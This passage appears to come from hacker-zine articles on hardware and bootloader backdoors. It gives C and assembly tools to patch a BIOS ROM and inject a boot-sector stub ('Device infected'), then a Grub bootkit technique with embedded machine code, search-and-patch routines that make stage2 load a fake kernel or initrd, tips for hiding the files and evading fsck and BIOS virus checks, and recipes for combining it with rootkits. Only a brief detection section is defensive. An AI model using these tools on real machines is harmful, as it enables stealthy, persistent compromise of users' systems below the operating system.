  if ((devfd = open(dev, O_RDONLY)) == -1)
    {
      fprintf(stderr, "could not open BIOS\n");
      exit(1);
    }
  if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT, 0644)) == -1)
    {
      fprintf(stderr, "could not open %s\n", out);
      exit(1);
    }
  buf = NULL;
  for (cnt = 0; (ret = read(devfd, tmp, BUFSIZE)) > 0; cnt += ret)
    {
      buf = realloc(buf, cnt + ret);
      memcpy(buf + cnt, tmp, ret);
    }
  if (ret == -1)
    {
      fprintf(stderr, "error reading BIOS\n");
      exit(1);
    }
  if ((tgt = search(buf, cnt)) == NULL)
    {
      fprintf(stderr, "could not find code to patch\n");
      exit(1);
    }
  patch(tgt, cnt - (tgt - buf), sector);
  for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > 0; i += ret)
    ;
  if (ret == -1)
    {
      fprintf(stderr, "could not write patched ROM to disk\n");
      exit(1);
    }
  return 0;
}
--[ evil.asm

;;; A sample code to be loaded by an infected BIOS instead of
;;; the real boot loader. It basically moves itself so it can
;;; load the real boot loader and jump to it. Replace the nops
;;; if you want it to do something useful.
;;; usage is :
;;;        no usage, this code must be loaded by store.c
;;; compile with : nasm -fbin evil.asm -o evil.bin

BITS  16
ORG   0

entry:                 ;; we need this label so we can check the code size
      jmp   begin      ; jump over data

;; here comes data
drive db    0          ; drive we're working on

begin:
      mov   [drive], dl      ; get the drive we're working on
      ;; segments init
      mov   ax, 0x07C0
      mov   ds, ax
      mov   es, ax
      ;; stack init
      mov   ax, 0
      mov   ss, ax
      mov   ax, 0xffff
      mov   sp, ax
      ;; move out of the zone so we can load the TRUE boot loader
      mov   ax, 0x7c0
      mov   ds, ax
      mov   ax, 0x100
      mov   es, ax
      mov   si, 0
      mov   di, 0
      mov   cx, 0x200
      rep   movsb
      ;; jump to our new location
      jmp   0x100:next
next:                 ;; we are now at the new location
      ;; load the true boot loader
      mov   dl, [drive]
      mov   ax, 0x07C0
      mov   es, ax
      mov   bx, 0
      mov   ah, 2
      mov   al, 1
      mov   ch, 0
      mov   cl, 1
      mov   dh, 0
      int   0x13
      ;; do your evil stuff here (ie : infect the boot loader)
      nop
      nop
      ;; execute system
      jmp   07C0h:0

size    equ     $ - entry
%if size+2 > 512
      %error "code is too large for boot sector"
%endif
times   (512 - size - 2) db 0    ; fill 512 bytes
db      0x55, 0xAA          ; boot signature
--[ store.c

/*
** code to be used to store a fake boot loader loaded by an infected BIOS
** usage is :
**         store <device to store on> <sector number> <file to inject>
** compile with : gcc store.c -o store
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define CODE_SIZE     512
#define SECTOR_SIZE   512

void  usage(char *cmd)
{
  fprintf(stderr, "usage is : %s <device> <sector> <code>\n", cmd);
  exit(1);
}

int   main(int argc, char **argv)
{
  int   off;
  int   i;
  int   devfd;
  int   codefd;
  int   cnt;
  char  code[CODE_SIZE];

  if (argc != 4)
    usage(argv[0]);
  if ((devfd = open(argv[1], O_WRONLY)) == -1)
    {
      fprintf(stderr, "error : could not open device\n");
      exit(1);
    }
  off = atoi(argv[2]);
  if ((codefd = open(argv[3], O_RDONLY)) == -1)
    {
      fprintf(stderr, "error : could not open code file\n");
      exit(1);
    }
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = read(codefd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
      {
        fprintf(stderr, "error reading code\n");
        exit(1);
      }
  lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET);
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = write(devfd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
      {
        fprintf(stderr, "error writing code\n");
        exit(1);
      }
  printf("Device infected\n");
  return 0;
}
      Okay, now that we can load our code using the BIOS, the time has
come to consider what we can do from this position. As we are nearly the
first to have control over the system, we can do really interesting
things.
      First, we can hijack BIOS interrupts and make them jump to our
code. This is interesting because instead of writing all the code in the
BIOS, we can hijack BIOS routines while having as much space as we need
and without having to do a lot of reverse engineering.
      Next, we can easily patch the boot loader on-the-fly, as it is our
own code which loads it. In fact, we don't even have to call the true
boot loader if we don't want to : we can make a fake one that loads a
nicely patched kernel based on the real one, or make a fake boot loader
(or even patch the real one on-the-fly) that loads the real kernel and
patches it on the fly. The choice is up to you.
        Finally, I'll mention one last thing that came to my mind.
Combined with IDTR hijacking, patching the BIOS can give us complete
control of the system. We patch the BIOS so that it loads our own boot
loader. This boot loader is a special one : it loads a mini-OS of our own
which sets up an IDT. Then, as we have hijacked the IDTR register (there
are several ways to do it, the easiest being to patch the target OS's
boot process in order to prevent it from erasing our IDT), we load the
true boot loader, which loads the true kernel. At this point, our own OS
hijacks the entire system with its own IDT, proxying any interrupt we
want and hijacking any event on the system. We can even use the system
clock as a scheduler for the two OSes : the tick will be caught by our
own OS and, depending on the configuration (we can say for example 10% of
the time for our OS and 90% for the real OS), we can execute our code or
give control to the real OS by jumping to its IDT.
       You can do lots of things simply by patching the BIOS, so I
suggest you implement your own ideas. Remember this is not so difficult,
documentation on the subject already exists, and we can really do lots of
things. Just remember to use Bochs for tests before going into the wild :
it certainly isn't fun when smoke comes out of one of the motherboard's
chips.
5.  Conclusion
     So that's it, hardware can be backdoored quite easily. Of course,
what I demonstrated here was just a quick overview. We can do LOTS of
things with hardware, things that can give us total control of the
computer we're on while remaining stealthy. There is a lot of work to do
in this area as more and more devices become CPU-independent and
implement many features that can be used to do funny things. Imagination
(and portability, sic...) are the only limits.
   For people very interested in having fun in the hardware world, I
suggest taking a look at CPU microcode programming (start with the AMD K8
reverse engineering, see [18]), network card BIOSes and the PXE system.

Hacking Grub for fun and profit



    0.0 - Trojan/backdoor/rootkit review


    1.0 - Boot process with Grub

        1.1 How does Grub work ?

        1.2 stage1

        1.3 stage1.5 & stage2

        1.4 Grub util


    2.0 - Possibility to load specified file


    3.0 - Hacking techniques

        3.1 How to load file_fake

        3.2 How to locate ext2fs_dir

        3.3 How to hack grub

        3.4 How to make things sneaky


    4.0 - Usage


    5.0 - Detection


    6.0 - At the end


    7.0 - Ref


    8.0 - hack_grub.tar.gz


--[ 0.0 - Trojan/backdoor/rootkits review


    Since 1989, when the first log-editing tool appeared (Phrack 0x19 #6
- Hiding out under Unix), trojans/backdoors/rootkits have evolved
greatly : from the early user-mode tools such as LRK4/5, to kernel-mode
ones such as knark/adore/adore-ng, then SuckIT and module injection, and
nowadays even static kernel patching.
    Think carefully, what remains untouched? Yes, that's the bootloader.
    So, in this paper, I present a way to make Grub follow your orders,
that is, to load another kernel/initrd image/grub.conf despite the files
you specify in grub.conf.


P.S.: This paper is based on Linux and EXT2/3 under x86 system.


--[ 1.0 - Boot process with Grub


----[ 1.1 - How does Grub work ?



                       +-----------+
                       | boot,load |
                       |    MBR    |
                       +-----+-----+
                             |
                     +-------+--------+     NO
                     | Grub is in MBR +------->-------+
                     +-------+--------+               |
                        Yes  |  stage1        +-------+--------+
               Yes  +--------+---------+      | jump to active |
             +--<---+ stage1.5 config? |      |    partition   |
             |      +--------+---------+      +-------+--------+
             |            No |                        |
     +-------+-------+       |                  +-----+-----+
     | load embedded |       |        stage1 -> | load boot |
     |   sectors     |       |                  |   sector  |
     +-------+-------+       V                  +-----+-----+
        ^    |               |                        |
        |    |               |       + - - - < - - - -+  Cf 1.3
        |    |               |       |         +------+------+
   stage1.5  +------->-------+-->----+----->---+ load stage2 |
                                               +------+------+
                                                      |
                 +-----------+-----------+
                 |   load the grub.conf  |
                 | display the boot menu |
                 +-----------+-----------+
                             |
                             | User interaction
                             |
                   +---------+---------+
                   | load kernel image |
                   |     and boot      |
                   +-------------------+



----[ 1.2 - stage1


    stage1 is 512 bytes; you can see its source code in stage1/stage1.S.
It's installed in the MBR or in the boot sector of a primary partition.
Its task is simple - load a specified sector (defined in stage2_sector)
to a specified address (defined in stage2_address/stage2_segment). If
stage1.5 is configured, the first sector of stage1.5 is loaded at address
0200:0000; if not, the first sector of stage2 is loaded at address
0800:0000.


----[ 1.3 - stage1.5 & stage2


    We know Grub is a file-system-sensitive loader, i.e. Grub can
understand and read files from different file systems, without the help
of the OS. How? The secret is stage1.5 & stage2. Take a glance at
/boot/grub and you'll find the following files:

stage1, stage2, e2fs_stage1_5, fat_stage1_5, ffs_stage1_5, minix_stage1_5,

reiserfs_stage1_5, ... 

    We've mentioned stage1 in 1.2 : the file stage1 is installed in the
MBR or in the boot sector, so even if you delete the file stage1, system
boot is not affected.
    What about zeroing the files stage2 and *_stage1_5? Can the system
still boot? The answer is 'no' for the former and 'yes' for the latter.
Wondering about the reason? Then continue reading...


    Let's see how *_stage1_5 and stage2 are generated:


-------------------------------- BEGIN -----------------------------------


gcc -o e2fs_stage1_5.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,2000

   e2fs_stage1_5_exec-start.o e2fs_stage1_5_exec-asm.o

   e2fs_stage1_5_exec-common.o e2fs_stage1_5_exec-char_io.o

   e2fs_stage1_5_exec-disk_io.o e2fs_stage1_5_exec-stage1_5.o

   e2fs_stage1_5_exec-fsys_ext2fs.o e2fs_stage1_5_exec-bios.o  

objcopy -O binary e2fs_stage1_5.exec e2fs_stage1_5



gcc -o pre_stage2.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,8200

   pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-boot.o

   pre_stage2_exec-builtins.o pre_stage2_exec-common.o

   pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o

   pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o

   pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o

   pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o

   pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o

   pre_stage2_exec-hercules.o pre_stage2_exec-serial.o

   pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o


objcopy -O binary pre_stage2.exec pre_stage2

cat start pre_stage2 > stage2

--------------------------------- END ------------------------------------


   According to the output above, the layout should be:


  [start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stage1_5.c]

  [fsys_ext2fs.c] [bios.c]


  [start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c]

  [cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c]

  [fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c]

  [hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c]


    We can see that e2fs_stage1_5 and stage2 are similar, but
e2fs_stage1_5 is smaller : it contains only the basic modules (disk I/O,
string handling, system initialization, ext2/3 file system handling),
while stage2 is all-in-one, containing all the file system modules,
display, encryption, etc.


    start.S is very important for Grub. stage1 loads start.S to
0200:0000 (if stage1_5 is configured) or 0800:0000 (if not), then jumps
to it. The task of start.S is simple (it is only 512 bytes) : it loads
the remaining parts of stage1_5 or stage2 into memory. The question is,
since the file-system-related code hasn't been loaded yet, how can grub
know the location of the remaining sectors? start.S uses a trick :


-------------------------------- BEGIN -----------------------------------


blocklist_default_start:
         .long 2          /* this is the sector start parameter, in logical
                             sectors from the start of the disk, sector 0 */
blocklist_default_len:    /* this is the number of sectors to read */
#ifdef STAGE1_5
         .word 0          /* the command "install" will fill this up */
#else
         .word (STAGE2_SIZE + 511) >> 9
#endif
blocklist_default_seg:
#ifdef STAGE1_5
         .word 0x220
#else
         .word 0x820      /* this is the segment of the starting address
                             to load the data into */
#endif
firstlist:       /* this label has to be after the list data!!! */
--------------------------------- END ------------------------------------


    an example: 

# hexdump -x -n 512 /boot/grub/stage2


00001d0  [ 0000    0000    0000    0000 ][ 0000    0000    0000    0000 ]

00001e0  [ 62c7    0026    0064    1600 ][ 62af    0026    0010    1400 ]

00001f0  [ 6287    0026    0020    1000 ][ 61d0    0026    003f    0820 ]


    We should interpret it (backwards) as : load 0x3f sectors (starting
with sector 0x2661d0) to 0x0820:0000, load 0x20 sectors (starting with
sector 0x266287) to 0x1000:0000, load 0x10 sectors (starting with sector
0x2662af) to 0x1400:0000, load 0x64 sectors (starting with sector
0x2662c7) to 0x1600:0000.
    In my distro, stage2 has 0xd4 (1+0x3f+0x20+0x10+0x64) sectors and a
file size of 108328 bytes; the two match well (the sector size is 512).


    When start.S finishes running, stage1_5/stage2 is fully loaded, and
start.S jumps to asm.S to continue execution.

    One problem remains: when is stage1.5 used? In fact, stage1.5 is not
necessary. Its task is to load /boot/grub/stage2 into memory. But pay
attention: stage1.5 uses the file system to load stage2. It analyzes the
dentry, gets stage2's inode, then stage2's blocklists. So if stage1.5 is
configured, stage2 is loaded via the file system; if not, stage2 is loaded
via both stage2_sector in stage1 and the sector lists in stage2's start.S.

    To make things clear, consider the following scenario (ext2/ext3):

       # mv /boot/grub/stage2 /boot/grub/stage2.bak

    If stage1.5 is configured, the boot fails: stage1.5 can't find
/boot/grub/stage2 in the file system. But if stage1.5 is not configured,
the boot succeeds! That's because mv doesn't change stage2's physical
layout, so stage2_sector remains the same, as do the sector lists in
stage2.


    Now, stage1 (-> stage1.5) -> stage2. Everything is in position. asm.S
switches to protected mode, opens /boot/grub/grub.conf (or menu.lst), reads
the configuration, displays the menu, and waits for the user's interaction.
After the user chooses a kernel, grub loads the specified kernel image
(and sometimes a ramdisk image as well), then boots the kernel.


----[ 1.4 - Grub util


    If your grub is overwritten by Windows, you can use grub util to

reinstall grub.


    # grub


    grub > find /grub/stage2      <- if you have boot partition


    grub > find /boot/grub/stage2 <- if you don't have boot partition


    (hd0,0)                       <= the result of 'find'

    grub > root (hd0,0)           <- set root of boot partition


    grub > setup (hd0)            <- if you want to install grub in mbr


    grub > setup (hd0,0)          <- if you want to install grub in the
                                     boot sector

    Checking if "/boot/grub/stage1" exists... yes
    Checking if "/boot/grub/stage2" exists... yes
    Checking if "/boot/grub/e2fs_stage1_5" exists... yes
    Running "embed /boot/grub/e2fs_stage1_5 (hd0)"... 22 sectors are
embedded. succeeded                <= if you install grub in a boot
                                      sector, this step fails
    Running "install /boot/grub/stage1 d (hd0) (hd0)1+22 p
(hd0,0)/boot/grub/stage2 /boot/grub/grub.conf"... succeeded



    We can see the grub util tries to embed stage1.5 if possible. If grub
is installed in the MBR, stage1.5 is located right after the MBR, 22
sectors in size. If grub is installed in a partition's boot sector, there
is not enough space to embed stage1.5 (for an ext2/ext3 partition the
superblock is at offset 0x400, which leaves only 0x200 bytes after the
boot sector for stage1.5), so the 'embed' command fails.
    Refer to the grub manual and source code for more info.


--[ 2.0 - Possibility to load specified file


    Grub has its own mini file system for ext2/3. It uses grub_open(),
grub_read() and grub_close() to open/read/close a file. Now, take a look
at ext2fs_dir():



/* preconditions: ext2fs_mount already executed, therefore supblk in buffer
 *                known as SUPERBLOCK
 * returns: 0 if error, nonzero iff we were able to find the file
 *          successfully
 * postconditions: on a nonzero return, buffer known as INODE contains the
 *                 inode of the file we were trying to look up
 * side effects: messes up GROUP_DESC buffer area
 */
int ext2fs_dir (char *dirname) {
  int current_ino = EXT2_ROOT_INO; /* start at the root */
  int updir_ino = current_ino;     /* the parent of the current directory */
  ...




    Suppose the line in grub.conf is:

    kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1

    grub_open calls ext2fs_dir("/boot/vmlinuz-2.6.11 ro root=/dev/hda1").
ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to
get data at any offset (the block map resides in INODE->i_block[] for
direct blocks).


    The internal logic of ext2fs_dir is:
    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
       ^ inode = EXT2_ROOT_INO, put the inode info in INODE;
    2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
        ^ find the dentry in '/', then put the inode info of '/boot' in
        INODE;
    3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
             ^ find the dentry in '/boot', then put the inode info of
             '/boot/vmlinuz-2.6.11' in INODE;
    4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
                           ^ the pointer is at a space and INODE is a
                           regular file, so return 1 (success); INODE
                           contains the info about /boot/vmlinuz-2.6.11.

    If we parasitize this code and return the inode info of file_fake,
grub will happily load file_fake, considering it /boot/vmlinuz-2.6.11.
    We can do this:
    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
       ^ inode = EXT2_ROOT_INO;
    2.  boot/vmlinuz-2.6.11 ro root=/dev/hda1
       ^ change '/' to 0x0, change EXT2_ROOT_INO to the inode of file_fake;
    3.  boot/vmlinuz-2.6.11 ro root=/dev/hda1
       ^ the EXT2_ROOT_INO (file_fake) info is in INODE, the pointer is at
       0x0, INODE is a regular file, return 1.


    Since we change the argument of ext2fs_dir, does it have side effects?
Don't forget the latter part, "ro root=/dev/hda1": it's the parameter
passed to the kernel. Without it, the kernel won't boot correctly.
(P.S.: Just "cat /proc/cmdline" to see the parameters your kernel has.)
    So, let's check the internals of "kernel=...".
    kernel_func processes the "kernel=..." line:


static int
kernel_func (char *arg, int flags)
{
  ...
  /* Copy the command-line to MB_CMDLINE.  */
  grub_memmove (mb_cmdline, arg, len + 1);
  kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);
  ...
}




    See? arg and mb_cmdline hold two copies of the string
"/boot/vmlinuz-2.6.11 ro root=/dev/hda1" (there is no overlap, so here
grub_memmove behaves just like a grub_memcpy would). In load_image, you can
see that arg and mb_cmdline don't interfere with each other. So, the
conclusion is: NO side effects. If you're not confident, you can add some
code to verify it.

--[ 3.0 - Hacking techniques


    The hacking techniques should apply to all grub versions (excluding
grub-ng) shipped with all Linux distros.


----[ 3.1 - How to load file_fake


    We can add a jump at the beginning of ext2fs_dir, then set the first
character of ext2fs_dir's argument to 0, change "current_ino =
EXT2_ROOT_INO" to "current_ino = INODE_OF_FAKE_FILE", then jump back.
    Attention: only when a certain condition is met may you load file_fake.
E.g.: when the system wants to open /boot/vmlinuz-2.6.11, /boot/file_fake
is returned; but when the system wants /boot/grub/grub.conf, the correct
file should be returned. If the code still returned /boot/file_fake, oops,
no menu would be displayed.

    The jump is easy, but how do we make "current_ino =
INODE_OF_FAKE_FILE"?

int ext2fs_dir (char *dirname) {
  int current_ino = EXT2_ROOT_INO; /* start at the root */
  int updir_ino = current_ino;     /* the parent of the current directory */

    EXT2_ROOT_INO is 2, so current_ino and updir_ino are initialized to 2.
The corresponding assembly should look like "movl $2, 0xffffXXXX(%esp)".
But keep optimization in mind: both current_ino and updir_ino are assigned
2, so the optimized result can be "movl $2, 0xffffXXXX(%esp)" and "movl
$2, 0xffffYYYY(%esp)", or "movl $2, %reg" then "movl %reg,
0xffffXXXX(%esp)"; "movl %reg, 0xffffYYYY(%esp)", or other variants. The
type is int and the value is 2, so the probability of "xor %eax, %eax;
inc %eax; inc %eax" is low; the same goes for "xor %eax, %eax; movb $0x2,
%al". What we need is to search for 0x00000002 from ext2fs_dir to
ext2fs_dir + depth (e.g. 100 bytes), then change 0x00000002 to
INODE_OF_FAKE_FILE.
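
    The search-and-patch step can be sketched in C. This is a hypothetical
helper of ours, not grub code; it assumes an x86 little-endian byte order
and that the only 0x00000002 dwords within `depth` bytes are the two
EXT2_ROOT_INO immediates:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Scan the first `depth` bytes of ext2fs_dir's machine code for the
   32-bit immediate 0x00000002 (EXT2_ROOT_INO) and overwrite it with the
   inode number of our fake file. Returns how many spots were patched;
   we expect two (current_ino and updir_ino). */
int patch_root_ino(unsigned char *code, int depth, uint32_t fake_ino)
{
    int patched = 0;
    for (int i = 0; i + 4 <= depth; i++) {
        uint32_t v;
        memcpy(&v, code + i, 4);
        if (v == 2) {
            memcpy(code + i, &fake_ino, 4);
            patched++;
            i += 3;  /* skip past the immediate we just wrote */
        }
    }
    return patched;
}
```

    A false positive is possible if the byte pattern 02 00 00 00 appears
for another reason within the search depth; keeping `depth` small makes
that unlikely.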


static char ext2_embed_code[] = {
    0x60,                         /* pusha                             */
    0x9c,                         /* pushf                             */
    0xeb, 0x28,                   /* jmp 4f                            */
    0x5f,                         /* 1: pop %edi                       */
    0x8b, 0xf,                    /* movl (%edi), %ecx                 */
    0x8b, 0x74, 0x24, 0x28,       /* movl 40(%esp), %esi               */
    0x83, 0xc7, 0x4,              /* addl $4, %edi                     */
    0xf3, 0xa6,                   /* repz cmpsb %es:(%edi), %ds:(%esi) */
    0x83, 0xf9, 0x0,              /* cmp $0, %ecx                      */
    0x74, 0x2,                    /* je 2f                             */
    0xeb, 0xe,                    /* jmp 3f                            */
    0x8b, 0x74, 0x24, 0x28,       /* 2: movl 40(%esp), %esi            */
    0xc6, 0x6, 0x00,              /* movb $0x0, (%esi)                 */
    0x9d,                         /* popf                              */
    0x61,                         /* popa                              */
    0xe9, 0x0, 0x0, 0x0, 0x0,     /* jmp change_inode                  */
    0x9d,                         /* 3: popf                           */
    0x61,                         /* popa                              */
    0xe9, 0x0, 0x0, 0x0, 0x0,     /* jmp not_change_inode              */
    0xe8, 0xd3, 0xff, 0xff, 0xff, /* 4: call 1b                        */

    0x0, 0x0, 0x0, 0x0,           /* kernel filename length            */
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, /* filename string, 48 bytes in all  */
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};

/* embedded code, 1st part */
memcpy(buf_embed, ext2_embed_code, sizeof(ext2_embed_code));

Of course you can write your own string-comparison algorithm.


/* embedded code, 2nd part, change_inode */
memcpy(buf_embed + sizeof(ext2_embed_code), s_start, s_mov_end - s_start);

/* embedded code, 3rd part, not_change_inode */
memcpy(buf_embed + sizeof(ext2_embed_code) + (s_mov_end - s_start) + 5,
       s_start, s_mov_end - s_start);


  The result is like this:


 ext2fs_dir:                                   not_change_inode:

  +------------------------+        +--------> +------------------------+

  | push %esp <= jmp embed |        |          | push %esp              |

  | mov %esp, %ebp         |        |          | mov %esp, %ebp         |

  | push %edi              |        |          | push %edi              |

  | push %esi              +--------<          | push %esi              |

  | sub $0x42c, %esp       |        |          | sub $0x42c, %esp       |

  | mov $2, fffffbe4(%esp) |        |          | mov $2, fffffbe4(%esp) |

  | mov $2, fffffbe0(%esp) |        |          | mov $2, fffffbe0(%esp) |

  |back:                   |        |          | jmp back               |

  +------------------------+        |          +------------------------+

 embed:                             +--------> change_inode:

  +------------------------+                   +------------------------+

  | save registers         |                   | push %esp              |

  | compare strings        |                   | mov %esp, %ebp         | 

  | if match, goto 1       |                   | push %edi              |

  | if not, goto 2         |                   | push %esi              |

  | 1: restore registers   |                   | sub $0x42c, %esp       |

  | jmp change_inode       |   INODE_OF_   ->  | mov $?, fffffbe4(%esp) |

  | 2: restore registers   |   FAKE_FILE   ->  | mov $?, fffffbe0(%esp) |

  | jmp not_change_inode   |                   | jmp back               |

  +------------------------+                   +------------------------+


----[ 3.2 - How to locate ext2fs_dir


    That's the difficult part. stage2 is generated by objcopy, so all the
ELF information is stripped - NO SYMBOL TABLE! We must find some PATTERN
to locate ext2fs_dir.


    The first choice is log2:

    #define log2(n) ffz(~(n))
    static __inline__ unsigned long
    ffz (unsigned long word)
    {
        __asm__ ("bsfl %1, %0"
                :"=r" (word)
                :"r" (~word));
        return word;
    }

    group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));


    The problem is that ffz is declared as __inline__, which means MAYBE
this function is inlined, MAYBE not. So we give it up.


    The next choice is SUPERBLOCK->s_inodes_per_group in:

    group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);

    #define RAW_ADDR(x) (x)
    #define FSYS_BUF RAW_ADDR(0x68000)
    #define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))
    struct ext2_super_block {
        ...
        __u32 s_inodes_per_group;  /* # Inodes per group */
        ...
    };

    From these we can calculate that SUPERBLOCK->s_inodes_per_group is at
0x68028 (s_inodes_per_group sits at offset 0x28 in the superblock). This
address only appears in ext2fs_dir, so the possibility of a collision is
low. After locating 0x68028, we could move backwards to find the start of
ext2fs_dir. But here comes another question: how do we identify the start
of ext2fs_dir? Of course you can search backwards for 0xc3, which is
likely a ret. But what if it's only part of an instruction, e.g. an
operand? Also, gcc sometimes adds padding to align function addresses
(4/8/16 bytes); how do we skip that padding? Just list all the possible
combinations?
    This method is practical, but not ideal.


    Now, we notice fsys_table:

    struct fsys_entry fsys_table[NUM_FSYS + 1] =
    {
      ...
    # ifdef FSYS_FAT
      {"fat", fat_mount, fat_read, fat_dir, 0, 0},
    # endif
    # ifdef FSYS_EXT2FS
      {"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},
    # endif
    # ifdef FSYS_MINIX
      {"minix", minix_mount, minix_read, minix_dir, 0, 0},
    # endif
      ...
    };

    fsys_table is used like this:

      if ((*(fsys_table[fsys_type].mount_func)) () != 1)


    So, our trick is:

1. Search stage2 for the string "ext2fs", get its offset, then convert it
   to a memory address (stage2 starts from 0800:0000): addr_1.
2. Search stage2 for addr_1, get its offset, then read the next 5 integers
   (A, B, C, D, E). Check: A < B? B < C? C < addr_1? D == 0? E == 0? If
   any answer is "no", go back to 1 and continue searching.
3. Then C is the memory address of ext2fs_dir; convert it to a file
   offset. OK, that's it.
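
    A minimal sketch of this search in C (the helper name is ours; it
assumes a little-endian host and that stage2's link address equals its
load address 0800:0000, i.e. linear 0x8000):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define STAGE2_BASE 0x8000  /* stage2 is loaded at 0800:0000 */

/* Find the file offset of ext2fs_dir inside a stage2 image using the
   fsys_table pattern described above. Returns -1 if not found. */
long find_ext2fs_dir(const unsigned char *img, long size)
{
    for (long i = 0; i + 7 <= size; i++) {
        /* step 1: find "ext2fs" (with its NUL) and compute addr_1 */
        if (memcmp(img + i, "ext2fs", 7) != 0)
            continue;
        uint32_t addr1 = (uint32_t)(STAGE2_BASE + i);

        /* step 2: find a dword equal to addr_1, then check the next
           five integers: mount < read < dir < addr_1, then 0, 0 */
        for (long j = 0; j + 24 <= size; j++) {
            uint32_t v[6];
            memcpy(v, img + j, 24);
            if (v[0] != addr1)
                continue;
            if (v[1] < v[2] && v[2] < v[3] && v[3] < addr1
                && v[4] == 0 && v[5] == 0)
                /* step 3: v[2] holds &ext2fs_dir */
                return (long)v[3] - STAGE2_BASE;
        }
    }
    return -1;
}
```

    The `v[3] < addr1` check works because the function bodies come before
the string constants in the image.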


----[ 3.3 - How to hack grub


    OK, with the help of 3.1 and 3.2, we can hack grub very easily.
    The first target is stage2. We get the start address of ext2fs_dir,
add a JMP to somewhere, then copy the embedded code there. But where is
'somewhere'? Obviously, the tail of stage2 is no good: that would change
the file size. We choose minix_dir as our target instead. What about
fat_mount? It's right behind ext2fs_dir. The answer is NO! Take a look at
how "root ..." works:

    for (fsys_type = 0; fsys_type < NUM_FSYS
         && (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_type++);

    Look at fsys_table: fat is ahead of ext2, so fat_mount is called
first. If fat_mount is modified, god knows the result. To be safe, we
choose minix_dir.


    Now, your stage2 can load file_fake. The size remains the same, but
the hash value has changed.


----[ 3.4 - How to make things sneaky


    Why must we use /boot/grub/stage2? We can make stage1 jump to a
stage2_fake (cp stage2 stage2_fake, then modify stage2_fake), so stage2
remains untouched.


    If you just cp stage2 to stage2_fake, stage2_fake won't work. Remember
the sector lists in start.S? You have to change the lists to point at
stage2_fake, not the original stage2. You can retrieve the inode, get
i_block[], and the block lists are there (don't forget to add the
partition offset). You have to bypass the VFS to get the inode info; see
[1].
    Since you use stage2_fake, the corresponding address in stage1 should
be modified. If stage1.5 is not installed, that's easy: you just change
stage2_sector from stage2_orig to stage2_fake (the MBR is changed). If
stage1.5 is installed and you're lazy and bold, you can skip stage1.5 -
modify stage2_address, stage2_sector and stage2_segment in stage1. This is
risky, because 1) if "virus detection" in the BIOS is enabled, the MBR
modification will be detected; 2) the "Grub stage1.5" & "Grub loading,
please wait" messages will change to "Grub stage2". It's a quick flash -
can you notice it on your FAST PC?
    If you really want to be sneaky, you can hack stage1.5 instead, using
techniques similar to 3.1 and 3.2. Don't forget to change the sector lists
of stage1.5 (start.S) - you have to append your embedded code at the end.


    You can make things sneakier still: hide stage2_fake/kernel_fake from
the FS, e.g. erase its dentry from /boot/grub. Wanna anti-fsck? Move the
inode of stage2 to one of the reserved inodes 1 to 10. See [2].


--[ 4.0 - Usage


    Combined with other techniques, see how powerful our hack_grub is.
    Note: all files should reside in the same partition!
    1) Combined with a static kernel patch
       a) cp kernel.orig kernel.fake
       b) apply the static kernel patch to kernel.fake [3]
       c) cp stage2 stage2.fake
       d) hack_grub stage2.fake kernel.orig inode_of_kernel.fake
       e) hide kernel.fake and stage2.fake (optional)
    2) Combined with module injection
       a) cp initrd.img.orig initrd.img.fake
       b) do module injection with initrd.img.fake, e.g. ext3.[k]o [4]
       c) cp stage2 stage2.fake
       d) hack_grub stage2.fake initrd.img inode_of_initrd.img.fake
       e) hide initrd.img.fake and stage2.fake (optional)
    3) Make a fake grub.conf
    4) More...


--[ 5.0 - Detection


    1) Keep an eye on the MBR and the following 63 sectors, as well as the
       primary partitions' boot sectors.
    2) If not 1,
        a) if stage1.5 is configured, compare the sectors from No. 3
           (absolute address; the MBR is sector No. 1) with
           /boot/grub/e2fs_stage1_5
        b) if stage1.5 is not configured, see if stage2_sector points to
           the real /boot/grub/stage2 file
